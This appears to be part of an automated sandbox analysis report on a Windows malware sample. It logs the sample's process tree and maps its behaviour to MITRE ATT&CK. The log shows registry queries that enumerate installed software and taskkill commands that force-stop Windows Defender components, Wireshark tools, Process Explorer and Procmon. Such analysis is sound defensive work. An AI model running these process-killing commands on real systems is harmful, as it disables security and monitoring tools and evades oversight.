- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:4536
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:4564
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4516
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4588
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:4644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:4664
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:4716
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:4736
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4756
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:4792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:4812
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4832
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4868
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:4888
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4944
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:4964
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4984
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:5020
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:5040
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5056
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5076
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4128
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:4256
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4308
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:4224
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:4164
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4328
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4376
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:1596
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3600
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4428
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:3564
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:3772
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:744
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3152
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:3192
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4532
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4604
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:4656
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4664
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4516
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:4688
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4732
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4764
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:4796
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4868
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:4916
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4956
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:5028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:5020
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5064
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4280
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:4136
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4128
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4228
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4368
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4224
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4020
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3916
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2180
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1492
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4276
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4708
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4348
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:3464
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2232
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3968
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:4588
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:5076
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4780
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:4264
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:4252
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3756
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:3936
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:5100
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3480
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:4860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:1012
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:1888
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:1220
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:640
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:4440
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:2128
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:1264
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:2980
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3904
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:4596
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:4644
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:4724
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:4772
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:5036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:5044
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4904
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4104
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:4116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:4228
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:1992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:732
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:556
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:2524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1492
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4624
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:3876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1016
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3968
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2072
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:412
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4860
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2196
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2120
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4604

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Windows 7 deprecation

Loading Replay Monitor...

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads